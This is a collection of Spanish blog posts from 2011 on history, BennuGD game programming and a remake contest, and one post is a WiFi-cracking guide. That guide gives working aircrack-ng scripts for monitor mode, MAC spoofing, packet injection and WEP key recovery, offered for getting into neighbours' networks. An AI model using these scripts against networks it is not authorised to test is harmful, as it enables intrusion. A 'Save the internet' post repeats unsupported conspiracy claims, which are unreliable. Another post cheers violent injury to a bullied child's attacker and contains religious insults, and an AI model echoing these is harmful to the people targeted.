jueves, 31 de marzo de 2011

La verdad detrás del cuadro

Muchos conoceréis este cuadro del veneciano Tiziano donde el emperador Carlos V cabalga heroicamente en la batalla de Mühlberg (24 de abril de 1547) donde se enfrentó al ejercito de Felipe I de Hesse.

Bien, pues este cuadro es pura propaganda ¿por qué? bueno, para empezar aquel día estaba cayendo un chaparrón de tres pares de cojones y Carlos V no iba a caballo ¿la razón? tenía unas hemorroides de cojones y cabalgar era mala idea, el dolor le recorría y lloraba amargamente por él; pero si es cierto que luchó y venció. Pero esta épica y hermosa estampa obra de Tiziano es una mentira, aunque muchos no lo saben y se traguen esta épica estampa.

Aunque no es un personaje histórico que me caiga especialmente bien si le reconozco el valor que tenía, este fue el último rey guerrero que reinó en España, en adelante serían burocratas como el esforzado Felipe II; para haceros una idea, tras la violación de un tratado por parte del rey de Francia (Francisco I) reto a este a combate singular que no quiso aceptar.

miércoles, 30 de marzo de 2011

Cosas que debes saber sobre el WIFI

Introducción
Como bien sabéis, podéis disponer en vuestras casas de conexión wifi. Muy útil para ganar movilidad en vuestra casa, sin tener que estar pegado a un cable de red para tener conexión con Internet.

Todo magia, luces y sonidos en el paradisíaco mundo del wifi hasta que te empiezan a contar que Fulanito se conecta a la red del vecino y tiene Internet. Y tu piensas ..... -"Pero eso le pasa por no tener clave para la conexión wifi"-. Es en ese momento cuando te dicen que ese usuario tenia wifi con contraseña, pero que se la han sacado.

Un escalofrió comienza a recorrer tu cuerpo y piensas. ¿Mi red es segura? ¿Estarán chupando de mi Wifi? ¿Es difícil chupar de la red Wifi de alguien? Con esta entrada para "frikis en apuros" tratare de acercaros esta realidad.

Wifi
Sobre el wifi, como ya sabéis, es un tipo de conexión inalámbrica basada en la norma IEEE 802.11 si no recuerdo mal. En general, el dispositivo al que os conectáis por este medio, en los entornos domésticos suele estar integrado en el router y al conectarnos a el formaremos parte de su red local. Esta seria la idea básica de su funcionamiento.

Una red wifi puede tener o no clave y para ello existe la encriptación del intercambio de datos basado en esa clave. Aquí los sistemas de encriptación que mas os vais a encontrar:
- WEP: Los cifrados de 64 y 128 bits. Pienso que es el tipo de clave mas fácil de hackear.
- WAP y WAP2: Las claves aquí no tienen limite de longitud lo que hace mas difícil su descifrado. El WAP2 es el WAP mejorado, aun mas seguro.

Ahora sabes como viaja la información y porque si no metes la clave no puedes conectarte a una red wifi. Y es que esa clave que metes para conectarte a la red wifi sirve para descifrar la información que intercambias de tu PC con el receptor de la conexión wifi.

Pero bueno, si esto es tan seguro ¿Como se han colado en mi red? ¿O como puedo yo probar la seguridad que tienen las redes wifi de mis vecinos? He intentado simplificar este apartado.

Robar claves en las redes Wifi
Si dispones de un sistema operativo Linux, en mi caso un Ubuntu versión 10.04 , tan solo tendrás que instalar las siguientes aplicaciones y yo te ayudare:

Nota: Si no dispones de un sistema Linux esto no te servirá de nada (también puede hacerse en windows de otra manera, pero no lo recomiendo).

Para realizar estos pasos es conveniente ser superusuario (root).
Primer paso: Instalar el aircrack-ng.

apt-get install aircrack-ng

Nota: Esto debería bastar, si te faltan aplicaciones que mas adelante se mencionaran coméntalo y editare la publicación.

Segundo paso: Hay una serie de comandos, pero he preferido simplificaros este paso y prepararos todo en 5 sencillos scripts:

1. Crea un directorio donde guardaremos los scripts, por ejemplo wifihack y otra llamada capturas dentro de esta para poder usarla posteriormente.

2. Creamos un fichero de texto y lo guardamos como "1_inicializar.sh". Este además de inicializarnos todo lo necesario, nos abrirá una ventana con todas las redes wifi a nuestro alcance, sus encriptaciones, los canales por las que se emiten (CH), sus direcciones MAC y sus bssid.

#Script 1
#Colocar la tarjeta de red para monitorear
airmon-ng start wlan0
#ApaÃño para no tener que reiniciar en el momento del hack
airmon-ng start start mon0
#damos de baja nuestro clone para falsear la dirección mac
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
ifconfig mon0 up
#Monitoreamos las redes inalámbricas cercanas
airodump-ng mon0

3. Con este otro script comenzaremos a capturar paquetes de esa red y a registrar toda la información en un fichero para su futura desencriptación ;). Le llamaremos "2_captura.sh"

#Script 2 - captura
clear
echo Introduce el canal de la red que se desea atacar
read canal
echo Introduce el nombre donde se guardaran las capturas de los paquetes
read archivo
echo Introduce la direccion MAC de la tarjeta atacada
read macatacada
echo $canal > ultcanal.txt
echo $archivo > ultarchivo.txt
echo $macatacada > ultmac.txt
airodump-ng -c $canal -w capturas/$archivo --bssid $macatacada mon0

4. Con este asociaremos nuestro equipo con el que deseamos atacar. Le llamaremos "3_asociar.sh".

#Script 3 - asociar
#Crear una asociacion entre nuestro PC y el modem atacado
clear
echo Introduce el nombre de la red a la que desea atacar.
read nombrered
macatacada=`cat ultmac.txt`
read macatacada
aireplay-ng -1 0 -e $nombrered -a $macatacada -h 00:11:22:33:44:55 mon0

5. Con este nosotros comenzaremos a inyectar paquetes, de esta manera capturaremos muchos mas paquetes y tardaremos menos en sacarle los paquetes necesarios para descifrar la clave. Le llamaremos "4_inyeccion.sh".

#Script 4 - Inyeccion de paquetes
mac=`cat ultmac.txt`
aireplay-ng -3 -b $mac -h 00:11:22:33:44:55 mon0


6. Finalmente, el fruto de nuestro trabajo, una vez que veas que has capturado 5000 paquetes realiza la primera pruena con este script. Si aun no tienes informacion suficiente para descifrar la clave espera 5000 paquetes mas y vuelve a intentarlo, calcula cuanto te falta para tenerla por completo. Este solo sirve para WEP, para WAP necesitarías usar diccionarios, pero todo es documentarse. Llamemosle "5_desencriptar.sh".

#Script 5 - descifrar
#Descifrar el paquete
nombref=`cat ultarchivo.txt`
aircrack-ng capturas/$nombref-01.cap

o sino, mejor en este caso escribir en la linea de comandos.

aircrack-ng capturas/NOMBRE(tabular para obtener más información y escoger un archivo de extensión cap)

# aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere
más paquetes capturados.
# aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta
# aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de
la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por
defecto es 128 y en 2wire 64 bits.




Las dos maneras sirven, la que os sea más cómoda.

Una vez creados todos los ficheros, se les asigna permisos de ejecución (chmod) o sino mediante propiedades y los ejecutamos como super usuario en el orden correcto (basandote en el orden numerico de los nombres), cada uno en una terminal diferente y vamos rellenando lo que se nos pide.

Conclusiones
Una vez visto con la facilidad con al que un usuario medio o experto en informática puede descifrar una clave wifi y conectarse a esta pensaras que estas solo ante el peligro y la de FUUUUUUUUUUs que vas a estar deseando de soltar.

Solución para conexiones no deseadas

Como he dicho puede que te sientas solo ante el peligro, pero esto tiene solución. Si en tu red domestica se conectan siempre los mismos equipos generalmente, solo tienes que hacer una lista de sus direcciones MAC e introducirlas en la configuración wifi del router, como únicas MACs con las que se podrán acceder. Es tan solo una solución que a mi parecer es muy sencilla, pero no tiene porque ser la única.

Espero que ahora veas las redes wifi de otra manera ;)

viernes, 25 de marzo de 2011

Save the internet: proyecto Volkado Total

Internet, la red de redes, está avanzando a un ritmo vertiginoso. Pero, ¿en el sentido que debiera? En los últimos años ha alcanzado unas cotas de importancia tan altas que todo aquel con un mínimo poder quiere controlarlo a su favor. Hasta tal punto, que corre un grave riesgo de desaparecer.

Lo sabe bastante gente; pero, la mayoría, impide que se difunda esta idea. Porque quiere que ocurra precisamente eso.



Hoy os vengo a hablar de una nueva plataforma que, creo yo, requiere nuestra atención: Save the internet: proyecto Volkado Total.

Primeramente os pongo un extracto de su manifiesto:



En el 2004 el responsable de la Oficina de Defensa de la Propiedad Intelectual de la Sociedad General de Autores y Editores (SGAE), Pedro Farre, advirtió que si los derechos de Propiedad Intelectual no se protegen, la red de redes desaparecerá porque no tendrá contenidos. El año siguiente, Paul Mockapetris, el inventor de DNS (Domain Name System), consideró que internet llegaría a desaparecer como tal en un plazo de diez años.

Sin embargo, basándonos en los documentos encontrados por Sam Peterson, ex miembro de la CIA y uno de los tapados del anterior gobierno estadounidense, parece que todo va más rápido de lo que muchos esperaban. Según estos documentos, las redes sociales están siendo acechadas por tres cuartas partes del G11, que presionan al resto de gobiernos para aprobar una nueva ley que tiene como propósito acabar con esta clase de webs.

Varias asociaciones de defensa y gestión de derechos de autores también están haciendo lo posible por acabar con Youtube y Spotyfy. De momento ya tienen el apoyo de más de 20 países, entre ellos Japón y Estados Unidos.

Varios buscadores están atravesando una importante crisis y sus directivos se verán obligados a hacerlo público en pocos meses. De momento, y a falta de más opciones, se plantean cobrar una mensualidad a todo aquel que quiera utilizar su buscador y resto de aplicaciones.

Hay muchas posibilidades de que las redes sociales como Facebook, Twitter y Youtube desaparecerán tal y como los conocemos, en el plazo de un año.

Y Francia, España y cada vez más países, implantan nuevas leyes que prometen un
futuro incierto.


¡Salvemos internet!




martes, 22 de marzo de 2011

Aprendiendo historia con Crom: Heliogábalo

Ah, los emperadores romanos; entre ellos encontramos algunos de los hombres más ilustres y respetados de toda la historia de occidente, hombres como Augusto, Claudio, Marco Aurelio o Vespasiano evocan a grandes hombres de Estado, eruditos o militares. Otros como Nerón, Calígula o Cómodo son sinónimo de locura, extravagancia y despilfarro (aunque es curioso que Cómodo fuese recuperado por emperadores posteriores y que su mala fama, merecida en parte, se deba a la literatura y al cine).
Pero luego están aquellos de quienes nos olvidamos, hombres peculiares desconocidos por la mayoría. Heliogábalo o Elagabalus es uno de estos emperadores desconocidos, reinó pocos años (alrededor de 6, es difícil de estimar), murió joven y asesinado en un oscuro complot que buscaba poner al frente del imperio (ya entrando en la brutal crisis del siglo III) a su primo. Toda la historiografía antigua y clásica le ha tenido a caer de un burro, considerándole un nefasto emperador, un decadente amoral que se prostituía y un idiota; personalmente no creo que sea así porque las fuentes que hablan sobre él son abiértamente hostiles y contradictorias (La Historia Augusta, principalmente), de hecho es uno de mis personajes históricos favoritos.
¿Las razones? Principalmente porque el tipo tuvo una vida peculiar y adoraba a piedras; hijo bastardo de Septimio Severo (por tanto hermanastro de su predecesor Caracalla, ese si que era un pieza) y una sacerdotisa siria el bueno de Elagabalus vivió la mayor parte de su vida en la ciudad de Emesa como sacerdote de El-Gabal que los romanos conocieron como Sol Invicto, este dios era una piedra. Cuando fue escogido como Emperador Elagabalus se fue a Roma vistiendo a la siria, exigiendo el trato al que estaba acostumbrado (y que era ajeno a la realidad de la élite romana)y se llevó a su querida piedra dios con él. De paso convirtió el pedrusco en la deidad principal del Imperio sustituyendo a los dioses clásicos, le construyó un templo a la siria en medio de la Ciudad Eterna donde instaló todos los objetos sagrados de la religión romana alrededor del poderoso pedrolo.
Que queréis que os diga, a mi que ver al poderoso imperio romano adorando durante 6 años a una piedra me hace mucha gracia.
"Pues vaya un capullo más anormal" pensaréis, no creo que fuese una idea estúpida. En aquel momento el Imperio estaba en problemas, había una crisis de la religiosidad tradicional (uno de los pilares fundamentales del Estado); Heliogabalo tomó una decisión que Constantino (llamado el Grande, mis dos cojones morenos) imitaría tiempo después: unificar a todo el Imperio bajo una sola religión (y adorar piedras no es tan raro, mirad a los musulmanes, casi lo prefiero a un judío en pañales clavado en la pared) ¿lo hizo torpemente? quizás pero era joven ¿salió adelante la cosa? no, joder, lo mataron y desmontaron su chiringuito para poner al psicópata de Alejandro Severo al mando. Pero fijaros que curioso, cuando lo mataron los romanos se preocuparon de devolver sana y salva la piedra dios a Emesa.
Otra de las peculiaridades de su gobierno fue el peso que tuvieron las mujeres en él, para consternación de los senadores que veían como su tía, madre y abuela asistían al Senado y participaban en él (algo único en la historia de Roma), tomaban decisiones en las distintas oficinas (eran mujeres de Estado, no unas cualesquiera) y en general tuvieron más peso en política que todas las emperatrices o madres de emperador de toda la historia Romana. De hecho, a la muerte de estas (como parte del complot) el Imperio aceleraría su desintegración.
Espero que os haya despertado la curiosidad por este singular personaje, pero por favor no tiréis de Wikipedia o Internet para informaros sobre él, buscad libros de historiadores serios y que tengan menos de 15 años y aprended más cosas de este extraño y único emperador.

miércoles, 16 de marzo de 2011

Tutorial BennuGD "for dummies"

Lección 1º: Pulsadores
Imaginemos una bombilla conectada a un pulsador del timbre de nuestra casa. Para que se encendiese habría que pulsar; pero, al soltar, se apagaria.

begin
set_mode(320,240,32,MODE_WINDOW);
load_fpg("images/graficos.fpg");
luz();
end


process luz()
begin
x = 160;
y = 120;
graph = 1;
loop
if (key(_p))
graph = 2;
else
graph = 1;
end
if (key(_esc))
exit();
end
frame;
end
end

Analicemos:
Después de toda la parafernalia pertinente a la declaracion de proceso y etceteras vendría (en este caso) un loop, seguido de la comprobacion de pulsar una tecla; en este caso, la tecla 'p'.

if (key(_p))

Ahora llega la ejecución:

graph = 2; //Cambiamos de grafico para mostrar la bombilla encendida

Si no:

else
graph = 1; //El grafico es el de la bombilla apagada
end


Este ejemplo se puede aplicar, principalmente, a movimientos del protagonista de nuestro juego (arriba, abajo, izda. y dcha.); para que, cuando dejemos de pulsar, se pare.

Descárgate el ejemplo aquí.
Fuente: http://forum.bennugd.org/index.php?topic=2133.msg38296#msg38296
Autor: Futublock

martes, 15 de marzo de 2011

Concurso de remakes Div-like

Un internauta llamado FreeYourMind ha publicado las bases de un concurso de videojuegos Div-like. Es una oportunidad única para participar en un concurso de sencilla temática y premios sabrosos.

Las bases en: http://gecasoft.no.sapo.pt/

Extracto de las bases:
Concurso de programación 'Thunder Hoop Remake'

Bienvenido al concurso que intentará hacer las delicias de los amantes del legendario arcade de Gaelco 'Thunder Hoop'.

Si tu pasión son los juegos retro, te encantan los remakes y la programación de juegos, tienes la oportunidad de conseguir una portatil open source 'Caanoo'.

Para ello sólo te tienes que divertir haciendo tu remake de 'Thunder Hoop' y encima poder ganar una consola por el esfuerzo.

Bases del Concurso:

1 - Lenguaje y Herramientas:
- Tiene que ser programado en un DIV-LIKE a elegir entre los siguientes:
a) BennuGD (http://www.bennugd.org/)
b) Fenix (http://fenix.divsite.net/)
c) Gemix (http://gemixstudio.com/)
- Se puede hacer para cualquier plataforma (consola o SO) que soporte el lenguaje.
- Se pueden utilizar modulos externos y proprietarios si el lenguaje lo permite.
- Se puede utilizar cualquier tipo de herramienta o tool auxiliar a la misma, necesarias para la creación de gráficos, modelos, sonidos, etc.
2 - Tipo de juego:
El objetivo es tener como minímo un remake de 'Thunder Hoop', pero por si algun motivo prefieres hacer el remake de otro clasico, tambien podras hacerlo y concursar de igual forma.

Sólo se aceptarán Remakes de los siguientes juegos (versión Arcade):
Genéro Plataformas/Disparos (Horizontal):
- Thunder Hoop (http://www.arcadiabay.de/images/games/thunder_hoop.jpg)
- Toki (http://www.gameclassification.com/files/games/Toki.png)
- Shadow Dancer (http://www.nostalgia80.com/wp-content/uploads/2010/09/sd2.jpg)
- Ken-Go (Lightning Sword) (http://arcade.svatopluk.com/irem/ken-go/ken-go_04.png)
Genéro Shooter (Horizontal):
- Aero Blaster (http://www.gameclassification.com/files/games/Air_Buster_Arcade.png)
- Thunder Cross II (http://www.sega-16.com/Features/Lost%20in%20the%20Arcade/Thunder_Cross_II.png)
- Thunder Blade (http://www.hardcoregaming101.net/thunderblade/thunderblade-2.png)
- Insector X (http://www.arcade-museum.com/images/118/118124212330.png)
Los shooter deberan respetar la dirección del scroll horizontal del original (o el efecto modo 7 en el caso de Thunder Blade).

Si se elige 'Insector X' se tendrá en cuenta que es un remake más sencillo de hacer, con lo cual se tendrá en cuenta que tendrá de ser un Remake un poco mas trabajado o cercano en contenidos al original.

NOTA sobre los remakes:

Se puede optar por 2 caminos, el programador elige el que quiera:
1 - Hacer un remake lo mas fiel posible al original. Se valorara el grado de aproximación obtenido en todos sus apartados.

2 - Hacer un juego baseado en el original, con detalles o fases nuevas como si fuera una continuación o una version especial del mismo (por ejemplo si comparamos una fase de Sonic 2 con una de Sonic 1, este tiene fases nuevas o movimientos nuevos, pero si lo miras a la primera podrias decir que eran el mismo juego pero una fase distinta).

Puedes optar por este camino, si quieres mantener el espirito del original pero aportando detalhes nuevos y originales, o sea, si prefieres hacer un remake 'a tu manera'.
3 - Condiciones:

Cada participante puede presentar tantos juegos/generos como quiera.

Pueden basearse o utilizar parte de código fuente ya publicado en otros juegos, si este sirve de ayuda para la creación del mismo. Eso si, el juego tendrá que demostrar que no se basa en una simple adaptación con gráficos nuevos de algo existente, o sea, tendrá que quedar fiel al juego elegido para Remake (demontrar que hay trabajo en el).

Los juegos no podrán ser publicados hasta que el concurso haya finalizado, lo unico que se permite es poder enseñarse alguna captura del mismo en algun foro de avances o ayuda. Si un juego es publicado antes, será descalificado inmediatamente.

Los juegos de menos de 10 MB podrán enviarse por e-mail a geca_portugal@yahoo.com.
Para los juegos de más de 10 MB, deberá proporcionarse un enlace de descarga del mismo en el email.

Junto con el juego se deben incluir todos los recursos utilizados por el mismo así como todo el código fuente, scripts de configuración y compilación, etc. O sea, todo lo necesario para la compilación y correcto funcionamiento del mismo.

Si utiliza algun modulo externo o dependencia que se haya programada exclusivamente para el mismo, este tambien deberá venir con su código fuente en el lenguaje que haya sido creado.
El código fuente no será evaluado, sólo será tenido en cuenta para comprobar que ha existido un minimo de esfuerzo al crear el remake, y que este no es un mero copy/paste de otros códigos.
En ningun caso el código será distruibuido a terceros salvo qu el autor lo declaré open source o así lo entienda.

El autor tendrá todos los derechos de su obra, podrá despúes distribuirlo bajo la licencia que entienda (open source, código cerrado, o lo que sea).

También se debe incluir un archivo "info.txt" con la siguiente información:
- Nombre del trabajo presentado.
- Descripción del juego y breve manual de uso.
- Nick / Nombre del programador.
- Dependencias o permisos de terceros (si existe algo utilizado bajo el consentimiento de terceras pesonas).
- E-mail de contacto.


Se evaluarán las siguientes categorias:

- Fidelidad y/o inovacíon en relación al original segun el tipo de remake.
(Sobretodo se evaluará la sensación que transmite comparado con el original)

- Jugabilidad/adición

- Rendimiento/robustez en su ejecución

- Gráficos/Animaciones (calidad de ripeo/animaciones o calidad de los gráficos originales/adaptados)

- Musica/Sonidos FX (calidad de ripeo o calidad del sonido original/adaptado)

(Leer más)

Me presento y me opongo

Me llaman Crom y me encanta tocar las narices. Las de arriba, no las de abajo.

También soy friki, no del tipo Carmen de Mairena o como los idiotas que aún van a Gran Hermano con la feliz idea de ser famosos más de 2 días. Lo mío son los comics, los videojuegos, los juegos de rol, las pelis, las novelas, las camisetas, los gayumbos, los DIU (aunque los uso a modo de frisbi), etc. No, el manga y el anime no me van, no me gustan las cosas de besasushis (que es como con cariño cariño llamo a gente como mi buen amigo Yawin).

Por cierto, es a él a quien tendréis que mandar vuestras quejas por mi presencia aquí. Necesitaba reclutas para su blog y me presenté, con el teclado afilado y los ojos brillantes, como los de una niña de Ohio ante la perspectiva de vaciar el tambor de su colt de Hello Kitty sobre un mangante que quiere hacerse con su colección de cromos de Mi pequeño pony. Bueno, Su pequeño pony, yo soy más de Pokemon.

Y ahora empiezo mi andadura por el blog este (¿Cómo se llamaba? Que más da, desde ahora será EL BLOG, todo con mayúsculas).

Este es mi primer regalo para todos vosotros, oh lectores de EL BLOG: un video, si, un jodido video “¡Que recurso más socorrido para hacer tu primera entrada, maldito vago de los cojones, dame entretenimiento genuino” dirán algunos.

Me la suda.

¿Quién es el prota del video? Un chaval australiano llamado Casey Heynes a quienes sus compañeros (por llamarlos de alguna manera que implique delatar la profesión de sus amorosas madres) y vecinos (tres cuartos de lo mismo) se han pasado los últimos 5 años haciéndole la vida imposible. Hasta que al fin el chico les hizo frente el 14 de marzo de 2011, miradlo porque no tiene desperdicio.

http://www.viddler.com/explore/MercWithMouth/videos/27/

El niño idiota que ha sido justamente brutalizado igual pierde un ojo y es probable que tenga problemas en cuello y pecho. Que se joda.

Y si tú eres el tipo de persona que ha gozado haciéndole la vida imposible a otro chaval…jódete, y ojala Casey aparezca y te destroce como al montón de residuos anales que eres.

lunes, 14 de marzo de 2011

La historia de BennuGD

En la década de los 90 el entonces estudiante Daniel Navarro Medrano creó como proyecto final de carrera una herramienta orientada a la creación de videojuegos de 32 bits bajo MS-DOS. El nuevo lenguaje, de nombre DIV Games Studio, combinaba características de C y Pascal con un entorno completo que permitía la creación y edición de todos los aspectos de los proyectos: programación, edición gráfica y sonora y un largo etc.

Fénix, inicialmente bajo el nombre DIVC y de naturaleza GNU y gratuita, apareció de la mano de Jose Luis Cebrián como una herramienta capaz de compilar y ejecutar esos juegos en GNU/Linux. El nombre fue cambiado en la versión 0.6 del compilador, que además introducía otras mejoras, como la aparición de un fichero intermedio entre el entorno de compilación y el entorno de ejecución. Ya no era necesario distribuir el código fuente de un juego para poder jugar a los juegos. La ventaja principal de esa práctica (similar en concepto a Java) era clara, compilar en una plataforma y ejecutar en muchas. En la versión 0.71 el proyecto quedó parado, lo que dio lugar a múltiples versiones derivadas que corregían fallos o añadían nuevas características.

La versión oficial de Fénix fue retomada por Slàinte en el año 2002, viejo conocido de la comunidad DIV por ser el webmaster de una de las páginas web más importantes para la comunidad, quien continuó el proyecto bajo el nombre de “Fénix-Proyecto 1.0” al que pronto se reincorporaría su creador y cuyo primer objetivo era limpiar el compilador de errores y estabilizarlo. Desde entonces el compilador ha sufrido numerosos cambios y mejoras, dejando
de un lado la compatibilidad con el lenguaje DIV, el desarrollo del cual quedó paralizado hace tiempo en su versión 2 desde la quiebra de la empresa que lo comercializaba, Hammer Technologies. (De hecho, DIV2 sólo es compatible con Ms-Dos y Windows 95/98).

Tras un periodo de relativa inactividad en donde Fénix se había estancado en su versión 0.84/0.84a, a mediados del 2006, Juan (a.k.a. "SplinterGU") retomó con fuerza el desarrollo de nuevas versiones del compilador/intérprete, incorporándole muchas mejoras en rendimiento y velocidad, añadiendo funciones nuevas y corrigiendo bugs crónicos, y modularizando por completo todo el entorno (una demanda mucho tiempo reclamada), hasta llegar a la versión 0.92a.

No obstante, ciertas desaveniencias con determinados miembros de la comunidad hicieron que Juan se decidiera por abandonar el desarrollo oficial de Fénix y crear un fork (una variante independiente) a partir del código de Fénix llamado Bennu. Bennu es el nombre de un dios egipcio, cuya apariencia física es la de una garza real llevando sobre la cabeza la corona del Alto Egipto. Este dios es el de la regeneración (cómo Fénix), debido al carácter de ave migratoria que reaparece, que renace, que se renueva periódicamente.

A partir de 2007, poco a poco se ha ido construyendo una nueva comunidad alrededor de este nuevo lenguaje renacido. Hoy en día el foro de Bennu (http://forum.bennugd.org) es un lugar muy activo lleno de gente que intercambia información, trucos y experiencias sobre este lenguaje y que están encantados de echar una mano. Además, la comunidad ofrece muchos otros recursos para el programador: desde a la documentación online del lenguaje, en forma de wiki (http://wiki.bennugd.org) -donde se pretende recoger la descripción de todas las funciones, variables, características sintácticas y entresijos del lenguaje- hasta diferentes proyectos, librerías y aplicaciones software que facilitan mucho el día a día a la hora de programar.

Después de tanto tiempo...

Es cierto, llevo muuuucho tiempo sin actualizar este blog. No tengo excusa. Soy un vago demente que busca incansablemente una forma de entretenerse (incansablemente, porque no me canso). La verdad es que cada dos o tres días me acuerdo de este blog, pero por causas ajenas a mi voluntad, mi subconsciente me ordena que no lo haga, que no postee otra vez.

Sin embargo, he decidido volver a intentarlo por enésima vez.

¡Frikis en apuros y otras historias comes again!